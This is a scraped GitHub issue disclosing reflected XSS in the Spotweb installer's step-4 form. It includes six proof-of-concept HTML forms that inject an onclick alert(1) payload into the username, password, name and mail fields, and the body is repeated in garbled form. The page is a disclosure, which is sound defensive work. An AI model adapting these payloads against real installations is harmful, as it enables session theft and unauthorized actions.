You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser.
Note that these multiple XSS vulnerabilities exist in the spotweb.
Have you searched the internet or Github for an answer?
Not related
To Reproduce
Steps to reproduce the behavior:
Go to the installation page
Complete the configuration including DB connection => goto step 4
Access each page of these HTML files.
Exploit 1 - exploit username parameter
<html><formmethod="POST" action="http://[localhost]/spotweb/install.php?page=4"><inputname='settingsform[username]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 2 - exploit newpassword1 parameter
<html><formmethod="POST" action="http://[localhost]/spotweb/install.php?page=4"><inputname='settingsform[newpassword1]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 3 - exploit newpassword2 parameter
<html><formmethod="POST" action="http://[localhost]/spotweb/install.php?page=4"><inputname='settingsform[newpassword2]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 4 - exploit firstname parameter
<html><formmethod="POST" action="http://[localhost]/spotweb/install.php?page=4"><inputname='settingsform[firstname]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 5 - exploit lastname parameter
<html><formmethod="POST" action="http://[localhost]/spotweb/install.php?page=4"><inputname='settingsform[lastname]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 6 - exploit mail parameter
<html><formmethod="POST" action="http://[localhost]/spotweb/install.php?page=4"><inputname='settingsform[mail]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Click each text field
Boom!
Expected behavior
This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim.
Screenshots
Desktop (please complete the following information):
(server) OS: ubuntu
(client) OS: window
Browser chrome
Spotweb Version 1.5.1 and below versions
Which branch Develop and Master
PHP version 7.1
Additional context
The code below displays the user-controlled parameter username, newpassword1, newpassword2, firstname, lastname and mail with incorrect sanitization:
Yes, you are right. However, remember that XSS vulnerabilities that occur during the installation process are also vulnerabilities.
For example, in CVE-2021-37389, CVE-2014-9571, CVE-2020-26043, CVE-2020-18670, etc., you can see the vendors acknowledging that there are vulnerabilities.
Describe the bug/issue
Have you searched the internet or Github for an answer?
To Reproduce
Steps to reproduce the behavior:
Exploit 1 - exploit
username
parameterExploit 2 - exploit
newpassword1
parameterExploit 3 - exploit
newpassword2
parameterExploit 4 - exploit
firstname
parameterExploit 5 - exploit
lastname
parameterExploit 6 - exploit
mail
parameterExpected behavior
Screenshots
Desktop (please complete the following information):
Additional context
The code below displays the user-controlled parameter
username
,newpassword1
,newpassword2
,firstname
,lastname
andmail
with incorrect sanitization:spotweb/templates/installer/step-004.inc.php
Line 41 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 46 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 51 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 56 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 61 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 66 in be2ab76
The text was updated successfully, but these errors were encountered: